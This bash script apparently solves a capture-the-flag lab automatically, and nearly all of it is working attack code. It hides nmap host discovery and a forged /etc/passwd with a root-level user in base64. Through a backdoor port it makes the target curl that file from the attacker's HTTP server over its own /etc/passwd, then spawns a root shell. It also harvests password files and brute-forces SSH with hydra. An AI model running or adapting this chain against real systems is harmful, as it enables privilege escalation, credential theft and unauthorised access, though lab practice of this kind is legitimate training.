#!/bin/bash echo "请输入你的学号:" read USER_INPUT TARGET=$(echo bm1hcCAkKGlmY29uZmlnIHwgZ3JlcCAtb1AgJ2luZXQgXEtcZCtcLlxkK1wuXGQrXC5cZCsnIHwgZ3JlcCAnXjEwXC4nKS8yNCB8IGdyZXAgJ05tYXAgc2NhbiByZXBvcnQnIHwgYXdrICd7cHJpbnQgJE5GfScgfCB0ciAtZCAnKCknIHwgYXdrIC1GJy4nICckNCA+PSAzICYmICQ0IDw9IDI1Myc= | base64 -d | bash) START_PORT=6000 END_PORT=7000 TIMEOUT=1 SPECIAL_PORT="" COMPANY_ABBR="BDA" LOCAL_IP=$(echo aWZjb25maWcgfCBncmVwIC1vUCAnaW5ldCBcS1xkK1wuXGQrXC5cZCtcLlxkKycgfCBncmVwICdeMTBcLic= | base64 -d | bash) PASSWD_FILE=$(echo cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCl9hcHQ6eDoxMDA6NjU1MzQ6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgprajp4OjEwMDA6MTAwMDo6L2hvbWUva2o6L2Jpbi9zaApzeXN0ZW1kLXRpbWVzeW5jOng6MTAxOjEwMTpzeXN0ZW1kIFRpbWUgU3luY2hyb25pemF0aW9uLCwsOi9ydW4vc3lzdGVtZDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLW5ldHdvcms6eDoxMDI6MTAzOnN5c3RlbWQgTmV0d29yayBNYW5hZ2VtZW50LCwsOi9ydW4vc3lzdGVtZDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLXJlc29sdmU6eDoxMDM6MTA0OnN5c3RlbWQgUmVzb2x2ZXIsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCm1lc3NhZ2VidXM6eDoxMDQ6MTA1Ojovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4Kc3NoZDp4OjEwNTo2NTUzNDo6L3J1bi9zc2hkOi91c3Ivc2Jpbi9ub2xvZ2luCm5ldzokMSRuZXckcDdwdGtFS1UxSG5hSHBSdHpOaXpTMTowOjA6cm9vdDovcm9vdDovYmluL2Jhc2g= | base64 -d > passwd) nohup python3 -m http.server 80 & for PORT in $(seq $START_PORT $END_PORT); do OUTPUT=$(timeout $TIMEOUT nc -v $TARGET $PORT 2>&1) if [[ $OUTPUT == *"open"* ]]; then echo "Checking port $PORT" RESPONSE=$(echo "" | nc -v $TARGET $PORT 2>&1) if [[ $RESPONSE != *"this is a honey pot"* ]]; then echo "Special port found: $PORT" echo "Response: $RESPONSE" SPECIAL_PORT=$PORT break fi fi done if [ -n "$SPECIAL_PORT" ]; then echo "The special port is: $SPECIAL_PORT" { sleep 1 echo "$COMPANY_ABBR" sleep 1 echo "/usr/bin/curl $LOCAL_IP/passwd -o /etc/passwd" sleep 1 echo "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'" sleep 1 echo "echo ----------------------------------------------------------" echo "echo 你的flag2是 && echo 123 | su new -c 'cat /root/flag* && echo $USER_INPUT | /root/Flag3Gen'" echo "echo ----------------------------------------------------------" sleep 1 echo "echo ----------------------------------------------------------" echo "echo 123 | su new -c 'cd /root && echo $USER_INPUT | ./Flag3Gen'" echo "echo ----------------------------------------------------------" sleep 1 echo "echo ----------------------------------------------------------" echo "echo VVNFUk5BTUU9ImtqIgpQQVNTV09SRFM9KCkKT1VUUFVUX0ZJTEU9Ii90bXAvcGFzc3dvcmRzLnR4dCIKCj4gIiRPVVRQVVRfRklMRSIKCndoaWxlIElGUz0gcmVhZCAtciBmaWxlOyBkbwogICAgcGFzc3dvcmQ9JChncmVwIC1vUCAiVGhlIHBhc3N3b3JkIGZvciB1c2VyIGtqIGlzIFxLLioiICIkZmlsZSIpCiAgICBpZiBbICEgLXogIiRwYXNzd29yZCIgXTsgdGhlbgogICAgICAgIFBBU1NXT1JEUys9KCIkcGFzc3dvcmQiKQogICAgICAgIGVjaG8gIiRwYXNzd29yZCIgPj4gIiRPVVRQVVRfRklMRSIKICAgIGZpCmRvbmUgPCA8KGZpbmQgLyAtdHlwZSBmIC1uYW1lICJwYXNzd2RfKiIgMj4vZGV2L251bGwp | base64 -d | bash" echo "echo ----------------------------------------------------------" sleep 1 echo "echo '--- START PASSWORD FILE ---'" echo "cat /tmp/passwords.txt" echo "echo '--- END PASSWORD FILE ---'" echo "exit" sleep 1 echo "exit" } | nc $TARGET $SPECIAL_PORT | tee interaction_output.txt sed -n '/--- START PASSWORD FILE ---/,/--- END PASSWORD FILE ---/p' interaction_output.txt | sed '1d;$d' > local_password_file.txt sleep 3 hydra -l kj -P local_password_file.txt ssh://$TARGET -t 50 echo "**************FINISHED***************" echo "**************FINISHED***************" echo "**************FINISHED***************" echo "Find your flag2 & flag3 in the interaction_output.txt" else echo "No special port found" fi